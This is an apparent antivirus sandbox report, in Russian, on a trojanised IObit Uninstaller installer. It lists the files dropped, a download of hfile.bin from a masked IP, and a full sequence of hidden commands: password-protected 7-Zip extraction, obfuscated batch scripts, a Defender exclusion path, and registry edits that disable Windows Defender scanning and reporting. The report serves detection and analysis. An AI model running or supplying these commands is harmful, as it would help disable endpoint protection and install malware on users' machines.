Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://45.##9.248.145/hfile.bin как hfile.bin
Запускает на исполнение
- '%WINDIR%\syswow64\net.exe' stop "IObit Uninstaller Service"
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\is-6lgbo.tmp\<Имя файла>.tmp
- %ALLUSERSPROFILE%\surfacereduction\extracted\file_3.zip
- %ALLUSERSPROFILE%\surfacereduction\extracted\file_4.zip
- %ALLUSERSPROFILE%\surfacereduction\extracted\file_5.zip
- %ALLUSERSPROFILE%\surfacereduction\extracted\file_6.zip
- %ALLUSERSPROFILE%\surfacereduction\extracted\antiav.data
- nul
- %ALLUSERSPROFILE%\surfacereduction\extracted\file_7.zip
- %ALLUSERSPROFILE%\surfacereduction\file.bin
- %ALLUSERSPROFILE%\surfacereduction\controlset003.vbs
- %ALLUSERSPROFILE%\surfacereduction\controlset002.bat
- %ALLUSERSPROFILE%\surfacereduction\controlset001_obf.bat
- %ALLUSERSPROFILE%\surfacereduction\compil32_obf.bat
- %ALLUSERSPROFILE%\surfacereduction\extracted\file_2.zip
- %ALLUSERSPROFILE%\surfacereduction\hfile.bin
- %TEMP%\is-822vn.tmp\metroblue.vsf
- %TEMP%\is-822vn.tmp\vclstylesinno.dll
- %TEMP%\is-822vn.tmp\istask.dll
- %TEMP%\is-822vn.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-822vn.tmp\_isetup\_setup64.tmp
- %TEMP%\is-822vn.tmp\_isetup\_regdll.tmp
- %TEMP%\is-rvocc.tmp\iobit uninstaller 11.6.0.12.tmp
- %ALLUSERSPROFILE%\surfacereduction\is-b3lmf.tmp
- %ALLUSERSPROFILE%\surfacereduction\is-fkgf5.tmp
- %TEMP%\is-ah8ir.tmp\is-a4s9b.tmp
- %TEMP%\is-ah8ir.tmp\_isetup\_iscrypt.dll
- %TEMP%\is-ah8ir.tmp\_isetup\_setup64.tmp
- %TEMP%\is-822vn.tmp\wizardform.bitmapimage1.bmp
- %ALLUSERSPROFILE%\surfacereduction\extracted\file_1.zip
Удаляет следующие файлы
- %TEMP%\is-ah8ir.tmp\iobit uninstaller 11.6.0.12.exe
- %TEMP%\is-ah8ir.tmp\_isetup\_iscrypt.dll
- %TEMP%\is-ah8ir.tmp\_isetup\_setup64.tmp
- %TEMP%\is-6lgbo.tmp\<Имя файла>.tmp
- %ALLUSERSPROFILE%\surfacereduction\7za.exe
- %ALLUSERSPROFILE%\surfacereduction\extracted\file_1.zip
- %ALLUSERSPROFILE%\surfacereduction\extracted\file_2.zip
- %ALLUSERSPROFILE%\surfacereduction\extracted\file_3.zip
- %ALLUSERSPROFILE%\surfacereduction\extracted\file_4.zip
- %ALLUSERSPROFILE%\surfacereduction\extracted\file_5.zip
- %ALLUSERSPROFILE%\surfacereduction\extracted\file_6.zip
- %ALLUSERSPROFILE%\surfacereduction\extracted\file_7.zip
- %ALLUSERSPROFILE%\surfacereduction\file.zip
- %ALLUSERSPROFILE%\surfacereduction\hfile.zip
- %ALLUSERSPROFILE%\surfacereduction\main.bat
Перемещает следующие файлы
- %TEMP%\is-ah8ir.tmp\is-a4s9b.tmp в %TEMP%\is-ah8ir.tmp\iobit uninstaller 11.6.0.12.exe
- %ALLUSERSPROFILE%\surfacereduction\is-fkgf5.tmp в %ALLUSERSPROFILE%\surfacereduction\main.bat
- %ALLUSERSPROFILE%\surfacereduction\is-b3lmf.tmp в %ALLUSERSPROFILE%\surfacereduction\7za.exe
- %ALLUSERSPROFILE%\surfacereduction\hfile.bin в %ALLUSERSPROFILE%\surfacereduction\hfile.zip
- %ALLUSERSPROFILE%\surfacereduction\file.bin в %ALLUSERSPROFILE%\surfacereduction\file.zip
Сетевая активность
Подключается к
- '45.##9.248.145':80
TCP
Запросы HTTP GET
- http://45.##9.248.145/hfile.bin
Другое
Ищет следующие окна
- ClassName: 'Edit' WindowName: ''
Создает и запускает на исполнение
- '%TEMP%\is-6lgbo.tmp\<Имя файла>.tmp' /SL5="$A020E,22746193,1185280,<Полный путь к файлу>"
- '%ALLUSERSPROFILE%\surfacereduction\7za.exe' e file.zip -p30252ByLHDLfR6540ByLHDLfR8305 -oextracted
- '%ALLUSERSPROFILE%\surfacereduction\7za.exe' e extracted/file_3.zip -oextracted
- '%ALLUSERSPROFILE%\surfacereduction\7za.exe' e extracted/file_4.zip -oextracted
- '%ALLUSERSPROFILE%\surfacereduction\7za.exe' e extracted/file_5.zip -oextracted
- '%ALLUSERSPROFILE%\surfacereduction\7za.exe' e extracted/file_7.zip -oextracted
- '%ALLUSERSPROFILE%\surfacereduction\7za.exe' e extracted/file_6.zip -oextracted
- '%ALLUSERSPROFILE%\surfacereduction\7za.exe' e extracted/file_2.zip -oextracted
- '%WINDIR%\syswow64\wscript.exe' "%ALLUSERSPROFILE%\SurfaceReduction\ControlSet003.vbs"
- '%ALLUSERSPROFILE%\surfacereduction\7za.exe' x -y -p10619mlgrAGP7211mlgrAGP24753 "*.zip"
- '%TEMP%\is-rvocc.tmp\iobit uninstaller 11.6.0.12.tmp' /SL5="$10270,20970856,79872,%TEMP%\is-AH8IR.tmp\IObit Uninstaller 11.6.0.12.exe"
- '%TEMP%\is-ah8ir.tmp\iobit uninstaller 11.6.0.12.exe'
- '%ALLUSERSPROFILE%\surfacereduction\7za.exe' e extracted/file_1.zip -oextracted
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\main.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\ControlSet001_obf.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\ControlSet002.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\net.exe' stop "IObit Uninstaller Service"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\compil32_obf.bat" "' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\main.bat" "
- '%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 5
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\ControlSet002.bat" "
- '%WINDIR%\syswow64\mode.com' 65,10
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\compil32_obf.bat" "
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath "%ALLUSERSPROFILE%\SurfaceReduction"
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 1 /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
- '%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 2
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\ControlSet001_obf.bat" "
- '%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 10
- '%WINDIR%\syswow64\net1.exe' stop "IObit Uninstaller Service"
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
- '%WINDIR%\syswow64\cmd.exe' /c rd /q /s "%ALLUSERSPROFILE%\SurfaceReduction\"
